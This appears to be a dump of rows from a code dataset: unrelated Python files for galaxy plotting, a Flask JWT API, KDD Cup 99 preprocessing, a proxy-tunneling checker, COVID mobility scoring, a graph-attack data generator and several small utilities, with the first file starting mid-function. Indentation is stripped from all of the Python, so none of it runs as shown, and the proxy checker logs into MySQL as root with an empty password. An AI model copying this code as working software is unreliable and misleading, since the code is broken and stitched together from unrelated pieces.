tau_V_neb_r = np.ma.masked_all((NGal))
while iGal < NGal:
if newImage:
f, axArr = new_img_mosaic(NRows, NCols, tSF__T[iT], ticks, sorted_by)
newImage = False
gal = listGal[iGal]
where_slice = np.where(califaID_GAL_zones__g == gal)[0]
N_zone = len(where_slice)
x1 = tau_V__Tg[iT][where_slice]
x2 = tau_V_neb__g[where_slice]
y = np.ma.log10(SFR_Ha__g[where_slice])
mask = ~(y.mask | x1.mask | x2.mask)
x1m = x1[mask]
x2m = x2[mask]
ym = y[mask]
N_not_masked = mask.sum()
if N_not_masked >= min_pixel_to_plot:
last_row = i
ax1 = axArr[i, j]
j += 1
ax2 = axArr[i, j]
ax1.set_axis_on()
ax2.set_axis_on()
#print '%s %d %d' % (gal, N_zone, N_not_masked)
xlabel = r'$\tau_V$'
ylabel = r'$\log\ SFR_{neb}\ $[M${}_\odot$ yr${}^{-1}]$'
ax1.scatter(x1m, ym, c = 'r', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6, label = r'$\tau_V^\star$')
ax1.scatter(x2m, ym, c = 'b', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6, label = r'$\tau_V^{neb}$')
xlim = [ 0., 2. ]
ylim = [-4., -0.5]
ax1.set_xlim(xlim)
if ticks:
ax1.set_ylim(ylim)
#ax.set_title(r'%.2f Myr' % (tSF__T[iT] / 1.e6))
#ax.legend(fontsize = 14, frameon = False, loc = 'upper right')
aux = plot_reglin_ax(ax1, x1m, ym, 0.05, 0.82, 'r')
tau_V_slope[iGal] = aux[0]
tau_V_x0[iGal] = aux[1]
tau_V_r[iGal] = aux[2]
tau_V_stderr[iGal] = aux[4]
aux = plot_reglin_ax(ax1, x2m, ym, 0.05, 0.92, 'b')
tau_V_neb_slope[iGal] = aux[0]
tau_V_neb_x0[iGal] = aux[1]
tau_V_neb_r[iGal] = aux[2]
tau_V_neb_stderr[iGal] = aux[4]
plot_gal_img_ax(ax2, '/Users/lacerda/CALIFA/images/%s.jpg' % gal, gal)
if ticks and i == NRows - 1 and j == 1:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if i == NRows - 1 and j == 5:
ax2.set_xlabel(xlabel)
if i == 3 and j == 1:
ax1.set_ylabel(ylabel)
if j == NCols - 1:
if i == NRows -1:
i = 0
newImage = True
save_img_mosaic(f, '%s_%s_%s_%s_%d' % (x1name, x2name, yname, fname_suffix, k), ticks)
plt.close(f)
k += 1
else:
i += 1
j = 0
else:
j += 1
if newImage == False and iGal == NGal - 1:
ax1 = axArr[last_row, 0]
if ticks:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if last_row < NRows - 1:
ax = axArr[last_row, 5]
ax.set_xlabel(xlabel)
if last_row < 3:
ax1.set_ylabel(ylabel)
save_img_mosaic(f, '%s_%s_%s_%s_%d' % (x1name, x2name, yname, fname_suffix, k), ticks)
plt.close(f)
iGal += 1
y1lab = r'$\tau_V^\star$'
plot_linreg_params(tau_V_slope, sorted_data__g, label[sorted_by],
r'%s slope' % y1lab, '%s_slope_%s.png' % (x1name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_x0, sorted_data__g, label[sorted_by],
r'%s x0' % y1lab, '%s_x0_%s.png' % (x1name, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(tau_V_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % y1lab, '%s_sqrcor_%s.png' % (x1name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % y1lab, '%s_stderr_%s.png' % (x1name, fname_suffix))
y2lab = r'$\tau_V^{neb}$'
plot_linreg_params(tau_V_neb_slope, sorted_data__g, label[sorted_by],
r'%s slope' % y2lab, '%s_slope_%s.png' % (x2name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_neb_x0, sorted_data__g, label[sorted_by],
r'%s x0' % y2lab, '%s_x0_%s.png' % (x2name, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(tau_V_neb_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % y2lab, '%s_sqrcor_%s.png' % (x2name, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(tau_V_neb_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % y2lab, '%s_stderr_%s.png' % (x2name, fname_suffix))
|
999,379 | 0fccf66cc28c2e85cf9ee8826eb383dd94d4d5e6 | /home/student/rosws/devel/.private/roslz4/lib/python2.7/dist-packages/roslz4/__init__.py |
999,380 | 997bfa8df1449669471173af906fbb1d4f8e6e02 | from flask import Flask
from flask_migrate import Migrate
from flask_restful import Api
from config import Config
from extensions import db, jwt
from resources.user import UserListResource, UserResource, MeResource, UserSheetListResource
from resources.token import TokenResource, RefreshResource, RevokeResource, black_list
from resources.sheet import SheetListResource, SheetResource, SheetPublishResource
def create_app():
app = Flask(__name__)
app.config.from_object(Config)
app.app_context().push()
register_extensions(app)
register_resources(app)
return app
def register_extensions(app):
db.init_app(app)
migrate = Migrate(app, db)
jwt.init_app(app)
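# Revocation hook: the loader below rejects any token whose jti has been added
# to black_list (presumably populated via the RevokeResource endpoint), even if
# the token's signature and expiry are otherwise valid.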
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return jti in black_list
def register_resources(app):
api = Api(app)
api.add_resource(UserListResource, '/users')
api.add_resource(UserResource, '/users/<string:username>')
api.add_resource(UserSheetListResource, '/users/<string:username>/sheets')
api.add_resource(MeResource, '/me')
api.add_resource(TokenResource, '/token')
api.add_resource(RefreshResource, '/refresh')
api.add_resource(RevokeResource, '/revoke')
api.add_resource(SheetListResource, '/sheets')
api.add_resource(SheetResource, '/sheets/<int:sheet_id>')
api.add_resource(SheetPublishResource, '/sheets/<int:sheet_id>/publish')
if __name__ == '__main__':
app = create_app()
app.run()
|
999,381 | 877f605e951145fc5e2c36ceda53f3305f760420 | import pickle  # used to read pkl files
import numpy as np
import scipy.sparse.csr
import random
def ReadPkl(filename: str):
with open(filename, "rb") as file:
data = pickle.load(file)
# For the adjacency matrix file, this loads a sparse matrix with entries like: (4, 192082) 1
# For the feature file, this loads a 2-D ndarray
# For the label file, this loads a 1-D ndarray
# print(type(data))
# print(data)
return data
def ReadLabels() -> np.ndarray:
"""
:return: the ground-truth labels read from disk
"""
return ReadPkl("Data/experimental_train.pkl")
def ReadFeatures() -> np.ndarray:
"""
:return: the features of the provided dataset
"""
return ReadPkl("Data/experimental_features.pkl")
def ReadAdj() -> scipy.sparse.csr.csr_matrix:
adj = ReadPkl("Data/experimental_adj.pkl")
return adj
def TestOutput():
# 543486 ~ 593486 is the target
x = []
y = []
data = []
for i in range(0, 500):
for j in range(0, 100):
# dst = random.randint(543486, 593485)
dst = 543486 + i * 100 + j
x.append(i)
y.append(dst)
# print(x, y)
# x.append(dst)
# y.append(i)
# data.append(1)
data.append(1)
adj = scipy.sparse.coo_matrix((data, (x, y)), shape=(500, 593986))
adj = adj.tocsr()
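# Each of the 500 test rows links to its own block of 100 consecutive target ids
# (543486..593485), yielding a 500 x 593986 CSR adjacency matrix with one
# nonzero per (user, target) pair built above.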
# print(np.transpose(adj[:, 593486:]) == adj[:, 593486:])
with open("adj.pkl", 'wb') as f: # 将数据写入pkl文件
pickle.dump(adj, f)
features = np.zeros((500, 100))
for i in range(0, 500):
for j in range(0, 100):
flag = random.randint(0, 1)
if flag == 0:
features[i][j] = 99.9
else:
features[i][j] = -99.9
print(features)
np.save("feature.npy", features)
# ReadPkl("Data/experimental_adj.pkl")
# ReadPkl("Data/experimental_features.pkl")
# ReadPkl("Data/experimental_train.pkl")
def readNpy(filename: str):
data = np.load(filename)
print(data)
if __name__ == '__main__':
TestOutput()
# readNpy("feature.npy") |
999,382 | 10da245f5a6120702894655446f8264fbca80d79 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# List tool for training users
#
# Function
# This program lists an account's child users, for purposes such as
# SoftLayer hands-on training.
#
# Usage
# 1. Enter the user ID and API-KEY on the first run only
#
# Notes
# Users that do not appear on the portal screen may sometimes be listed.
#
# Author  Maho Takara takara@jp.ibm.com
#
# 2015/5/8  Initial release
# 2015/8/13 Improved so the user ID and API-KEY are entered only on the first run
import SoftLayer
import random
import string
import requests
import user_account as ua
#
#
# Main
#
#
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings()
clt = ua.api_login()
if clt == False:
print "Failed: api_login()"
exit(1)
#
    # List of child users
#
try:
object_mask = 'id,username,firstName,lastName,sslVpnAllowedFlag,userStatusId'
ret = clt['Account'].getCurrentUser(mask=object_mask)
users = clt['SoftLayer_User_Customer'].getChildUsers(mask=object_mask,id=ret['id'])
except SoftLayer.SoftLayerAPIError as e:
print("faultCode=%s, faultString=%s" % (e.faultCode, e.faultString))
exit(1)
print "%-16s %-6s %-15s %-15s %-10s %-7s" % ("Username", "id", "firstName", "lastName","SSL_VPN","Status")
for user in users:
ret = clt['SoftLayer_User_Customer'].isMasterUser(id=user['id'])
if ret != True:
print "%-16s %-6d %-15s %-15s %-10s %-7s" % (user['username'],user['id'],user['firstName'],user['lastName'],user['sslVpnAllowedFlag'],user['userStatusId'])
#exit(0)
|
999,383 | 2233cfdcf1cbe8f06783c6bad39e25b77bd579c3 | # -*- coding: utf-8 -*-
"""preprocessing _kdd
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1TJSQ9_-XH7VOkFj1jfRUyPSUakLccq2b
"""
import pandas as pd
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
df = pd.read_csv('/content/drive/My Drive/kddcup99_csv.csv')
df.head()
df.describe()
import seaborn as sns
import matplotlib.pyplot as plt
#get correlations of each features in dataset
corrmat = df.corr()
top_corr_features = corrmat.index
plt.figure(figsize=(20,20))
#plot heat map
g=sns.heatmap(df[top_corr_features].corr(),annot=True,cmap="RdYlGn")
"""Removal of redundant features¶"""
df['lnum_outbound_cmds'].value_counts()
df.drop('lnum_outbound_cmds', axis=1, inplace=True)
df['is_host_login'].value_counts()
df.drop('is_host_login', axis=1, inplace=True)
df['wrong_fragment'].value_counts()
df.drop('wrong_fragment', axis=1, inplace=True)
df['hot'].value_counts()
df.drop('hot', axis=1, inplace=True)
df['num_failed_logins'].value_counts()
df.drop('num_failed_logins', axis=1, inplace=True)
df['logged_in'].value_counts()
df.drop('logged_in', axis=1, inplace=True)
df['lroot_shell'].value_counts()
df.drop('lroot_shell', axis=1, inplace=True)
df['lnum_file_creations'].value_counts()
df.drop('lnum_file_creations', axis=1, inplace=True)
df['lnum_shells'].value_counts()
df.drop('lnum_shells', axis=1, inplace=True)
df['lnum_access_files'].value_counts()
df.drop('lnum_access_files', axis=1, inplace=True)
df['is_guest_login'].value_counts()
df.drop('is_guest_login', axis=1, inplace=True)
df['serror_rate'].value_counts()
df.drop('serror_rate', axis=1, inplace=True)
df['srv_serror_rate'].value_counts()
df.drop('srv_serror_rate', axis=1, inplace=True)
df['rerror_rate'].value_counts()
df.drop('rerror_rate', axis=1, inplace=True)
df['srv_rerror_rate'].value_counts()
df.drop('srv_rerror_rate', axis=1, inplace=True)
df['same_srv_rate'].value_counts()
df.drop('same_srv_rate', axis=1, inplace=True)
df['diff_srv_rate'].value_counts()
df.drop('diff_srv_rate', axis=1, inplace=True)
df['srv_diff_host_rate'].value_counts()
df.drop('srv_diff_host_rate', axis=1, inplace=True)
df['dst_host_same_srv_rate'].value_counts()
df.drop('dst_host_same_srv_rate', axis=1, inplace=True)
df['dst_host_diff_srv_rate'].value_counts()
df.drop('dst_host_diff_srv_rate', axis=1, inplace=True)
df['dst_host_same_src_port_rate'].value_counts()
df.drop('dst_host_same_src_port_rate', axis=1, inplace=True)
df['dst_host_srv_diff_host_rate'].value_counts()
df.drop('dst_host_srv_diff_host_rate', axis=1, inplace=True)
df['dst_host_serror_rate'].value_counts()
df.drop('dst_host_serror_rate', axis=1, inplace=True)
df['dst_host_srv_serror_rate'].value_counts()
df.drop('dst_host_srv_serror_rate', axis=1, inplace=True)
df['dst_host_rerror_rate'].value_counts()
df.drop('dst_host_rerror_rate', axis=1, inplace=True)
df['dst_host_srv_rerror_rate'].value_counts()
df.drop('dst_host_srv_rerror_rate', axis=1, inplace=True)
df['lsu_attempted'].value_counts()
df.drop('lsu_attempted', axis=1, inplace=True)
df['urgent'].value_counts()
df.drop('urgent', axis=1, inplace=True)
#df['lnum_outbound_cmds'].value_counts()
#df.drop('lnum_outbound_cmds', axis=1, inplace=True)
#df['is_host_login'].value_counts()
#df.drop('is_host_login', axis=1, inplace=True)
df['protocol_type'] = df['protocol_type'].astype('category')
df['service'] = df['service'].astype('category')
df['flag'] = df['flag'].astype('category')
cat_columns = df.select_dtypes(['category']).columns
df[cat_columns] = df[cat_columns].apply(lambda x: x.cat.codes)
"""Removal of duplicates"""
df.drop_duplicates(subset=None, keep='first', inplace=True)
df.shape
df['label'].value_counts()
"""Log-scaled distribution of attacks"""
plt.clf()
plt.figure(figsize=(12,8))
params = {'axes.titlesize':'18',
'xtick.labelsize':'14',
'ytick.labelsize':'14'}
matplotlib.rcParams.update(params)
plt.title('Distribution of attacks')
#df.plot(kind='barh')
df['label'].value_counts().apply(np.log).plot(kind='barh')
plt.show()
"""KDD skewness and kurtosis"""
df.skew()
df.kurtosis()
"""Univariate histogramms"""
import matplotlib.pyplot as plt
import matplotlib
params = {'axes.titlesize':'28',
'xtick.labelsize':'24',
'ytick.labelsize':'24'}
matplotlib.rcParams.update(params)
df.hist(figsize=(50, 30), bins=20)
plt.show()
"""KDD standardization"""
df.shape
data = df.values
X = data[:, 0:13]
X
from sklearn.preprocessing import StandardScaler
sScaler = StandardScaler()
rescaleX = sScaler.fit_transform(X)
rescaleX
df_rescaled = pd.DataFrame(data=rescaleX)
df_rescaled.hist(figsize=(50, 30), bins=20)
plt.show()
"""KDD normalization¶"""
from sklearn.preprocessing import Normalizer
norm = Normalizer()
xNormalize = norm.fit_transform(X)
xNormalize
df_Normalized = pd.DataFrame(data=xNormalize)
df_Normalized.hist(figsize=(50, 30), bins=20)
plt.show()
"""Encoding"""
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
df['label'] = df['label'].astype('category')
cat_columns = df.select_dtypes(['category']).columns
df[cat_columns] = df[cat_columns].apply(lambda x: x.cat.codes)
data = df.values
Y = data[:, 13]
X = data[:, 0:13]  # features only; column 13 is the encoded label
Y
X
# (no transpose: PCA expects samples on rows and features on columns)
df.shape
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
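# PCA keeps the n_components directions of largest variance; fit() ignores the Y argument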
pca.fit(X,Y)
pca.components_
pca.explained_variance_
pca.transform(X)
|
999,384 | ee1d847c961865f8348fac6607fac673a6ee2f42 | __all__ = ["type", "client", "typebuilder"] |
999,385 | da9035186710c9264b98ed38b1f427a1c4ed37b8 | while True:
print(input.acceleration(Dimension.X))
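    # readings beyond ±17 on the X axis are treated here as a shake/strong motion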
if input.acceleration(Dimension.X) > 17 or input.acceleration(Dimension.X) < -17:
light.show_animation(light.rainbow_animation, 100)
else:
light.clear() |
999,386 | 4b3aba265888afdcf1826876a7aac25dc6e609cd | import threading
import mysql.connector
import datetime
import urllib.request as urllib2
import time
db = mysql.connector.connect(
host="127.0.0.1",
user="root",
passwd="",
database="brofistool"
)
conn = db.cursor()
hasil_test = []
def data():
print("Proses Dimulai")
sql_apn = "SELECT apn FROM t_fraud_test_progress_detail WHERE suspect_fraud IS NULL GROUP BY apn"
conn.execute(sql_apn)
apns = conn.fetchall()
for apn in apns:
sql_proxy = "SELECT id,ip_address,url,port " \
"FROM t_fraud_test_progress_detail " \
"WHERE suspect_fraud IS NULL " \
"AND modem = 'modem-1' " \
"AND test_type = 'proxy tunneling' " \
"AND apn = '%s' " \
"LIMIT 10" % apn
conn.execute(sql_proxy)
proxys = conn.fetchall()
t = threading.Thread(target=proxy_check, args=[proxys])
t.start()
t.join()
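        # join() immediately after start() waits for the thread to finish,
        # so APNs are effectively checked one at a time rather than concurrently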
print("Proses Selesai")
for hasil in hasil_test:
update = "UPDATE t_fraud_test_progress_detail " \
"SET suspect_fraud = '%s', " \
"started_at = '%s', " \
"finished_at = '%s' " \
"WHERE id = %s" % (hasil[3],hasil[1],hasil[2],hasil[0])
conn.execute(update)
db.commit()
def proxy_check(proxy):
print(threading.currentThread().getName(), 'Starting')
for data in proxy:
id = data[0]
ip = data[2]
if ip is None:
ip = data[1]
port = data[3]
if port is None:
port = 1080
address = str(ip) + ":" + str(port)
# print(address)
now = datetime.datetime.now()
started = now.strftime("%Y-%m-%d %H:%M:%S")
try:
proxy_handler = urllib2.ProxyHandler({'http': address})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://103.41.204.195/ping.php")
sock = urllib2.urlopen(req, timeout=10)
rs = sock.read(1000)
            if not rs:  # read() returns b'' (not None) when nothing comes back
proxy_result = "No"
else:
proxy_result = "Yes"
now = datetime.datetime.now()
finished = now.strftime("%Y-%m-%d %H:%M:%S")
        except Exception:
proxy_result = "No"
now = datetime.datetime.now()
finished = now.strftime("%Y-%m-%d %H:%M:%S")
isi_test = [id, started, finished, proxy_result]
hasil_test.append(isi_test)
print(threading.currentThread().getName(), 'Exiting')
data() |
999,387 | 92844ac7a8d0441b9576e4171c9294244cb68aae | import pandas as pd
import matplotlib.pyplot as plt
import datetime
import numpy as np
from clean_data import clean_data
"""
Calculate state's immobility index - a single number representing how much social
mobility declined during the COVID pandemic.
The following mobility variables were used:
retail_and_recreation, grocery_and_pharmacy, transit_stations, workplaces
Residential and parks were excluded given their inverse relationship with the pandemic.
Index calculated as the 4 variables' average across:
1. the 2 weeks immediately following the state's maximum stringency index
2. the 2 weeks in the middle of January 2021, as direct contrast with baseline
Parameters:
-----------
df (DataFrame): cleaned dataset for a particular state
Returns
-------
index (float): immobility index for state
"""
def immobility_index(df):
immobility_var = ["mobility_retail_and_recreation", "mobility_grocery_and_pharmacy", "mobility_transit_stations", "mobility_workplaces"]
max_strin = df.idxmax()["stringency_index"]
#2 weeks immediately following max stringency
days_range1 = list(pd.date_range(start=max_strin, end=max_strin + datetime.timedelta(days=14)))
#2 weeks in the middle of January 2021
days_range2 = list(pd.date_range(start = "2021-01-10", end = "2021-01-24"))
df_restricted = df.loc[days_range1+days_range2,:]
index = df_restricted.mean()[immobility_var].sum()/4
return index
"""
Creates immobility score by normalizing immobility indices. Higher the score, the more immobile the state.
Most immobile state will have a score of 100.
Not a strict normalization - least mobile state has a score > 0.
Parameters:
-----------
df (DataFrame): state immobility index DataFrame
Returns
-------
none, changes to df are made in-place
"""
def immobility_scores(df):
df["immobility_score"] = round((df["immobility_index"]/df["immobility_index"].min())*100, 1)
"""
Render the contents of a DataFrame as an image in table format. It turns out there's no
built-in way to do this. Credit for this function goes to the following StackExchange thread:
https://stackoverflow.com/questions/19726663/how-to-save-the-pandas-dataframe-series-data-as-a-figure
Parameters:
-----------
data (DataFrame): DataFrame to turn into an image
col_width (float): width of a single table column
row_height( float): height of a single table row
font_size (float): size of font
Returns
-------
fig, ax: figure and axis for rendered table image
"""
def render_mpl_table(data, col_width=3.0, row_height=0.625, font_size=14,
header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',
bbox=[0, 0, 1, 1], header_columns=0,
ax=None, **kwargs):
if ax is None:
size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])
fig, ax = plt.subplots(figsize=size, dpi=400)
ax.axis('off')
mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns, cellLoc = "left", **kwargs)
mpl_table.auto_set_font_size(False)
mpl_table.set_fontsize(font_size)
for k, cell in mpl_table._cells.items():
cell.set_edgecolor(edge_color)
if k[0] == 0 or k[1] < header_columns:
cell.set_text_props(weight='bold', color='w')
cell.set_facecolor(header_color)
else:
cell.set_facecolor(row_colors[k[0]%len(row_colors) ])
return ax.get_figure(), ax
"""
Compare the 50 US states by how immobile they became as a result of the COVID pandemic.
First calculate an immobility index for each state based on mobility variables. Then an immobility score.
See function descriptions above for details.
Sort the states by immobility score (most immobile first) and saves the dataframe as image in table format.
Save entire table, top 10 states, and bottom 10 states as:
../img/state_comparison.png
../img/state_comparison_head.png
../img/state_comparison_tail.png
"""
if __name__ == "__main__":
mobility = ["mobility_retail_and_recreation", "mobility_grocery_and_pharmacy", "mobility_parks", "mobility_transit_stations", "mobility_workplaces", "mobility_residential"]
restrictions = ["school_closing", "workplace_closing", "cancel_public_events","restrictions_on_gatherings", "public_transport_closing", "stay_at_home_requirements", "restrictions_on_internal_movement", "stringency_index"]
virus = ["new_confirmed", "cumulative_persons_fully_vaccinated"]
#get the location keys for US states
index_df = pd.read_csv("../data/index.csv")
states_index = index_df.loc[(index_df.country_code == "US") & (index_df.aggregation_level==1), :]
state_keys = list(states_index["key"])
state_names=list(states_index["subregion1_name"])
#create data frame with state names and location keys, excluding non-state territories
data = {"key": state_keys, "name": state_names, "immobility_index":np.zeros(len(state_keys)), "avg_stringency":np.zeros(len(state_keys))}
state_df = pd.DataFrame(data).set_index("key")
state_df = state_df.drop(["US_AS", "US_GU", "US_MP", "US_PR", "US_VI", "US_DC"])
#calculate the immobility index for each state
for key in state_df.index:
print("Working on " + key)
df = pd.read_csv(f'https://storage.googleapis.com/covid19-open-data/v3/location/{key}.csv', parse_dates=["date"], index_col="date")
df = clean_data(df)
state_df.loc[key, "immobility_index"] = round(immobility_index(df),1)
state_df.loc[key, "avg_stringency"] = round((df["stringency_index"].max()+df["stringency_index"].loc["2021-01-15"])/2, 1)
#normalize the immobility indices into immobility scores
immobility_scores(state_df)
#sort by immobility score, descending
state_df = state_df.sort_values(by=["immobility_score"], ascending=False)
state_df=state_df[["name", "immobility_score", "immobility_index", "avg_stringency"]]
#save entire dataframe as table image
fig,ax = render_mpl_table(state_df, header_columns=0, col_width=3.5)
fig.savefig("../img/state_comparison.png", dpi=400, bbox_inches='tight')
#save the top 10 immobile states as table image
fig,ax = render_mpl_table(state_df.head(10), header_columns=0, col_width=3.5)
ax.set_title("Top 10 States by Immobility Score", fontsize=18, fontweight='bold')
fig.savefig("../img/state_comparison_head.png", dpi=400, bbox_inches='tight')
#save the bottom 10 immobile states as table image
fig,ax = render_mpl_table(state_df.tail(10), header_columns=0, col_width=3.5)
ax.set_title("Bottom 10 States by Immobility Score", fontsize=18, fontweight='bold')
fig.savefig("../img/state_comparison_tail.png", dpi=400, bbox_inches='tight') |
999,388 | 5bc047e6f779204eaacc333ada241bb7d769b682 | from setuptools import setup, find_packages
test_dependencies = [
'pytest',
'flake8',
]
extras = {
'tests': test_dependencies,
}
setup(
name='objconf',
version='0.3.0',
description='Object configuration for Python projects',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
url='https://github.com/milosta/objconf',
author='Miloslav Stanek',
author_email='milostanek@gmail.com',
packages=find_packages(exclude=['docs', 'tests']),
python_requires='>=3.6',
install_requires=[
'pyaml',
],
tests_require=test_dependencies,
extras_require=extras,
)
|
999,389 | 9c078270a4d410d14ee2cf2e3a38cd39b3ca47e5 | # -*- coding: utf-8 -*-
import math
def stripl(l):
    """
    Strips all elements of a list and removes the empty ones.
    """
    return [s for s in (x.strip() for x in l) if s]
def islice(n, m):
"""
    An iterator that splits a total of n items into pieces of length m;
    the last piece may be shorter. Yields (index, start, end) tuples.
"""
npiece = int(math.ceil(1.0*n/m))
for i in range(npiece):
if (i+1)*m > n:
yield i, i*m, n
else:
yield i, i*m, (i+1)*m
def slice(n, m):
"""
    Similar to `islice` but returns a list instead of an iterator.
"""
chunks = []
for piece in islice(n, m):
chunks.append(piece)
return chunks
def islicel(l, m):
"""
An iterator to return slices from the list, each slice has m elements
except for the last one.
"""
for i, start, end in islice(len(l), m):
yield i, l[start:end]
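# Example: list(islicel([1, 2, 3, 4, 5], 2)) -> [(0, [1, 2]), (1, [3, 4]), (2, [5])]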
|
999,390 | e62d5fe26b7fdc65ccc31ce8f315a2088b024ac7 | # messaging/views.py
from django.http import JsonResponse, HttpResponse
from django.db.models import Count, Q
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
from . import models
from . import serializers
from userauth import models as userauth_models
@login_required
def load_inbox(request):
"""Load user inbox threads
- Retrieve all of the threads that includes the user in the clients filed.
- count number of unread messages using related ame receipts cpntaining user
- returns {"threads":[thread]}
"""
threads = models.MessageThread.objects.filter(clients=request.user).annotate(
unread_count=Count('receipts',filter=Q(receipts__recipient=request.user))
)
thread_data = serializers.MessageThreadListSerializer(threads).data
#user = userauth_models.User.objects.filter(username=request.user.username)
#print(user.username)
#print(get_channel_layer())
#print(request.session['channel_name'])
return JsonResponse({'threads':thread_data})
@login_required
def load_messages(request):
"""Load messages from thread
- Load 30 messages by default
- the 'before' parameter will load the last 30 messages relative to the date
- returns json {messages:[message], end:bool}
"""
thread = models.MessageThread.objects.get(hash_id=request.GET['id'])
# check if user is a part of this chat
if not request.user in thread.clients.all():
return HttpResponse(status=403)
# query for messages filter
q = [Q(thread=thread)]
if 'before' in request.GET:
q.append(Q(date__lt=int(request.GET['before'])))
# query messages matching filter
messages = models.Message.objects.filter(*q).order_by('-id')
messages_data = serializers.MessageListSerializer(messages[:30]).data
# mark any unread messages in chat as read
thread.mark_read(request.user)
return JsonResponse({"messages":messages_data,"end":messages.count() <= 30})
@login_required
@csrf_exempt
def add_chatroom(request):
"""Add user to chatroom
- create thread if existing one with title does not exist
- user is added to the chat as well as the channel_layer group using the channel_name
specified in the session
"""
title = request.POST['title'].strip()
psk = request.POST['psk']
# If thread already exists
if models.MessageThread.objects.filter(title=title).exists():
thread = models.MessageThread.objects.get(title=title)
        if thread.psk != psk:
            # Invalid passkey
            return HttpResponse(status=403)
# If the thread does not exist yet
else:
return HttpResponse(status=405)
if not request.user in thread.clients.all():
thread.clients.add(request.user)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
return HttpResponse(status=200)
@login_required
@csrf_exempt
def create_chatroom(request):
title = request.POST['title'].strip()
psk = request.POST['psk']
if models.MessageThread.objects.filter(title=title).exists():
return HttpResponse(status=403)
else:
thread = models.MessageThread(title=title, psk=psk)
thread.save()
if not request.user in thread.clients.all():
thread.clients.add(request.user)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
return HttpResponse(status=200)
@login_required
@csrf_exempt
def add_direct(request):
"""Create a direct message with another user
- search for friend
- create a thread for the direct message
- add user and friend to direct message
"""
friend = request.POST['friend'].strip()
if userauth_models.User.objects.filter(username=friend).exists():
friendUser = userauth_models.User.objects.get(username=friend)
elif userauth_models.User.objects.filter(phone_number=friend):
friendUser = userauth_models.User.objects.get(phone_number=friend)
elif userauth_models.User.objects.filter(email=friend):
friendUser = userauth_models.User.objects.get(email=friend)
else:
return HttpResponse(status=403) #no friend :(
threadName = request.user.username + friendUser.username
if models.MessageThread.objects.filter(title=threadName).exists():
thread = models.MessageThread.objects.get(title=threadName)
elif models.MessageThread.objects.filter(title=(friendUser.username + \
request.user.username)).exists():
thread = models.MessageThread.objects.get(title=(friendUser.username \
+ request.user.username))
else:
thread = models.MessageThread(title=threadName, psk=threadName, \
admin=request.user.username, friend1 = friendUser.username, is_direct=True)
#thread = models.MessageThread(title=threadName, psk=threadName)
thread.save()
if not request.user in thread.clients.all():
thread.clients.add(request.user)
#thread.clients.add(friendUser)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
#if not friendUser in thread.clients.all():
# thread.clients.add(friendUser)
# channel_layer = get_channel_layer()
# if 'channel_name' in request.session:
# async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
thread_data = serializers.MessageThreadSerializer(thread).data
return HttpResponse(status=200)
|
999,391 | bc446ccb204ecfd0d716125f36e7ab610c79d722 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
import re
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
        # Sort by height descending, breaking ties by k ascending; Python 3 removed
        # cmp-style comparators, so use a key function instead.
        people.sort(key=lambda p: (-p[0], p[1]))
        res = []
        for v in people:
            res.insert(v[1], v)
        return res
if __name__ == '__main__':
s = Solution()
print(s.reconstructQueue([[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]))
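    # Expected output: [[5, 0], [7, 0], [5, 2], [6, 1], [4, 4], [7, 1]]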
|
999,392 | 699b1fcc70928edcfdec97cfacce46947b4185c6 | import sys
sys.stdin = open("input.txt", "rt")
input = sys.stdin.readline
n = int(input())
for _ in range(n):
vps = input()
stack = []
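    # push '(' and pop on a matching ')'; an unmatched ')' is pushed and the scan
    # stops early, leaving the stack non-empty so the line is reported invalid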
for x in vps:
if x == '(':
stack.append(x)
elif x == ')':
if len(stack) != 0 and stack[-1] == "(":
stack.pop()
else:
stack.append(x)
break
if len(stack) == 0:
print("YES")
else:
print("NO") |
999,393 | de3c113674d7138a4709d0c5fa9e32a19f823d67 | # Generated by Django 4.0.2 on 2022-02-27 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='client',
old_name='created',
new_name='created_at',
),
migrations.AddField(
model_name='client',
name='updated_at',
field=models.DateTimeField(
auto_now=True, verbose_name='Updated at'
),
),
]
